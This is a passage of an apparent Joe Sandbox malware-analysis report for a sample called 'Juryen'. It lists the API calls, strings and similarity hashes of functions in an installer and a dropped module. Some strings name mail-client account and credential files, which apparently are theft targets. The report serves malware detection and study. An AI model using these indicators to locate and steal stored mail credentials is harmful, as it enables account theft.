                                                                    • _free.LIBCMT ref: 1F759336
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                    • Instruction ID: 63e0ce8f325b4280a51469bf51f3eea96c4a157569e0df0069cb8b933fe7ebdb
                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                    • Instruction Fuzzy Hash: 59119335540B08FAEA20ABF1ED4DFCF7BAD9F45704F400C24A69AB6072DA36B5048791
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                                                    • GetMessagePos.USER32 ref: 00404E9E
                                                                    • ScreenToClient.USER32(?,?), ref: 00404EB8
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                    • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                    • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00403001
                                                                    • wsprintfW.USER32 ref: 00403011
                                                                    • SetWindowTextW.USER32(?,?), ref: 00403021
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 0040300B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                    • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                                                    • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                    • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,1F756FFD,00000000,?,?,?,1F758A72,?,?,00000100), ref: 1F75887B
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,1F758A72,?,?,00000100,5EFC4D8B,?,?), ref: 1F758901
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1F7589FB
                                                                    • __freea.LIBCMT ref: 1F758A08
                                                                      • Part of subcall function 1F7556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1F755702
                                                                    • __freea.LIBCMT ref: 1F758A11
                                                                    • __freea.LIBCMT ref: 1F758A36
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1414292761-0
                                                                    • Opcode ID: ba0b9b9140ef209460f88bfadda2cd3989425718f1edbf4cc008d17e674b9f2b
                                                                    • Instruction ID: e2253af679d837169ea0f9c543d41f90351a0e13ede925cd58d5031069bac972
                                                                    • Opcode Fuzzy Hash: ba0b9b9140ef209460f88bfadda2cd3989425718f1edbf4cc008d17e674b9f2b
                                                                    • Instruction Fuzzy Hash: F551E472610216AFEB15CEB4DC84EAB77A9EB84764F114629FC14DA1A0EB35FC60C690
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                    • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: c2b671b088f8a2c6a2cc46e86308de55ebb46a294384aac1552312227abe31fd
                                                                    • Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
                                                                    • Opcode Fuzzy Hash: c2b671b088f8a2c6a2cc46e86308de55ebb46a294384aac1552312227abe31fd
                                                                    • Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8
                                                                    APIs
                                                                    • _strlen.LIBCMT ref: 1F751607
                                                                    • _strcat.LIBCMT ref: 1F75161D
                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1F75190E,?,?,00000000,?,00000000), ref: 1F751643
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,1F75190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1F75165A
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,1F75190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 1F751661
                                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1F75190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1F751686
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                    • String ID:
                                                                    • API String ID: 1922816806-0
                                                                    • Opcode ID: 6914022145c22245c6266c6623ee550ec61e81748cc4a1948c3635e40fcda2ef
                                                                    • Instruction ID: bd257018bccaab1c64222e43503574cdb30b29492b685df2e5a82db6d8957d07
                                                                    • Opcode Fuzzy Hash: 6914022145c22245c6266c6623ee550ec61e81748cc4a1948c3635e40fcda2ef
                                                                    • Instruction Fuzzy Hash: 6221C83AA00304ABDB04DF54FC84EFE77B8EF88721F24405BE504AB151EB74B94687A5
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 1F751038
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1F75104B
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1F751061
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 1F751075
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 1F751090
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 1F7510B8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                    • String ID:
                                                                    • API String ID: 3594823470-0
                                                                    • Opcode ID: 867eac5d386c9eb41514e1bf63a8ee01741721378089d990cefe19c925ba2365
                                                                    • Instruction ID: 155cc86afe94801da754fe4f8cf342070785205cc605e75adb760f50ce2504e1
                                                                    • Opcode Fuzzy Hash: 867eac5d386c9eb41514e1bf63a8ee01741721378089d990cefe19c925ba2365
                                                                    • Instruction Fuzzy Hash: EB21A33990036CABCF10DA60FC5CDDB3728EF84225F104296E859971B1DE70AA9ACB80
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,1F753518,1F7523F1,1F751F17), ref: 1F753864
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 1F753872
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1F75388B
                                                                    • SetLastError.KERNEL32(00000000,?,1F753518,1F7523F1,1F751F17), ref: 1F7538DD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: ad47b8b0d2ca23c8d94430996c508fb55245329b21fc4d8e036b670a4a604ee8
                                                                    • Instruction ID: 4cc3daaba5cb4b5f7ddb85651a31dc14724bb82ad36956fd80dc2eb5d7e5fa8c
                                                                    • Opcode Fuzzy Hash: ad47b8b0d2ca23c8d94430996c508fb55245329b21fc4d8e036b670a4a604ee8
                                                                    • Instruction Fuzzy Hash: 5201D43760C7226EF6C91A797CD8E562B97DB89674F20022AE0209D1F0EF1378398360
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,1F756C6C), ref: 1F755AFA
                                                                    • _free.LIBCMT ref: 1F755B2D
                                                                    • _free.LIBCMT ref: 1F755B55
                                                                    • SetLastError.KERNEL32(00000000,?,?,1F756C6C), ref: 1F755B62
                                                                    • SetLastError.KERNEL32(00000000,?,?,1F756C6C), ref: 1F755B6E
                                                                    • _abort.LIBCMT ref: 1F755B74
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 3160817290-0
                                                                    • Opcode ID: 9323f90c8db8a43e008e06e03d9a69c0fc38665681b4f6991c4fffc6883808e7
                                                                    • Instruction ID: b5298c4e559fc8ee5d7549868acffcf1251ed53c53ccfefe301ef385e8c452fe
                                                                    • Opcode Fuzzy Hash: 9323f90c8db8a43e008e06e03d9a69c0fc38665681b4f6991c4fffc6883808e7
                                                                    • Instruction Fuzzy Hash: D4F0FC3A504761BBD20216347C4CE5E262B8FC9679F250225F818DA1B0FF25A41741A4
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$wsprintf
                                                                    • String ID: ... %d%%
                                                                    • API String ID: 551687249-2449383134
                                                                    • Opcode ID: 05f4ba2d2f2a4a5dfa404d26d053dcd1f9bdf675e575ac8564198bce70fe1ccc
                                                                    • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                                                    • Opcode Fuzzy Hash: 05f4ba2d2f2a4a5dfa404d26d053dcd1f9bdf675e575ac8564198bce70fe1ccc
                                                                    • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9
                                                                    APIs
                                                                      • Part of subcall function 1F751E89: lstrlenW.KERNEL32(?,?,?,?,?,1F7510DF,?,?,?,00000000), ref: 1F751E9A
                                                                      • Part of subcall function 1F751E89: lstrcatW.KERNEL32(?,?,?,1F7510DF,?,?,?,00000000), ref: 1F751EAC
                                                                      • Part of subcall function 1F751E89: lstrlenW.KERNEL32(?,?,1F7510DF,?,?,?,00000000), ref: 1F751EB3
                                                                      • Part of subcall function 1F751E89: lstrlenW.KERNEL32(?,?,1F7510DF,?,?,?,00000000), ref: 1F751EC8
                                                                      • Part of subcall function 1F751E89: lstrcatW.KERNEL32(?,1F7510DF,?,1F7510DF,?,?,?,00000000), ref: 1F751ED3
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1F75122A
                                                                      • Part of subcall function 1F75173A: _strlen.LIBCMT ref: 1F751855
                                                                      • Part of subcall function 1F75173A: _strlen.LIBCMT ref: 1F751869
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                    • API String ID: 4036392271-1520055953
                                                                    • Opcode ID: bcba8523ab6b8b3a8b9022066d47e48fcbab880236bbc48ff6e0e9dca5de3813
                                                                    • Instruction ID: 7513ac45b3e12c6685c8930d5754538f43a2412873eb2621461be13e9cca5cff
                                                                    • Opcode Fuzzy Hash: bcba8523ab6b8b3a8b9022066d47e48fcbab880236bbc48ff6e0e9dca5de3813
                                                                    • Instruction Fuzzy Hash: 7821C3B9E103586AEB1097A0FC85FEE7339EF84B15F001556FA08EB1E0E6F12D858758
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00434000,771B3420,00436800,00000000,004034F7,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                    • CharNextW.USER32(?,00434000,771B3420,00436800,00000000,004034F7,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                    • CharPrevW.USER32(?,?,771B3420,00436800,00000000,004034F7,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: *?|<>/":
                                                                    • API String ID: 589700163-165019052
                                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                    • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                    • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,1F754AEA,?,?,1F754A8A,?,1F762238,0000000C,1F754BBD,00000000,00000000), ref: 1F754B59
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1F754B6C
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,1F754AEA,?,?,1F754A8A,?,1F762238,0000000C,1F754BBD,00000000,00000000,00000001,1F752082), ref: 1F754B8F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 01d511bb7bb04781009d78db253cb41523a7adceb0ce51738a62717239ecbf5f
                                                                    • Instruction ID: 37bfb58ca654532383d2ab50366e2927a6b1c0271f54e08b79bb034e318e46bb
                                                                    • Opcode Fuzzy Hash: 01d511bb7bb04781009d78db253cb41523a7adceb0ce51738a62717239ecbf5f
                                                                    • Instruction Fuzzy Hash: 34F06831A04218BFDB119F90CC68FDE7FB9EF48361F004159F809A6160EB359A66CA51
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                    • wsprintfW.USER32 ref: 00406917
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%S.dll$UXTHEME
                                                                    • API String ID: 2200240437-1106614640
                                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                    • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                    • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(00000000,00000000,0040A5C8,00435000,?,?,00000031), ref: 004017D5
                                                                    • CompareFileTime.KERNEL32(-00000014,?,0040A5C8,0040A5C8,00000000,00000000,0040A5C8,00435000,?,?,00000031), ref: 004017FA
                                                                      • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                      • Part of subcall function 004055C6: lstrlenW.KERNEL32(00421EE8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                      • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,00421EE8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                      • Part of subcall function 004055C6: lstrcatW.KERNEL32(00421EE8,00403412,00403412,00421EE8,00000000,?,00000000), ref: 00405621
                                                                      • Part of subcall function 004055C6: SetWindowTextW.USER32(00421EE8,00421EE8), ref: 00405633
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID:
                                                                    • API String ID: 1941528284-0
                                                                    • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                    • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                                                    • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                    • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D
                                                                    APIs
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CloseEnum$DeleteValue
                                                                    • String ID:
                                                                    • API String ID: 1354259210-0
                                                                    • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                    • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                                                    • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                    • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                    • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                    • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                    • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
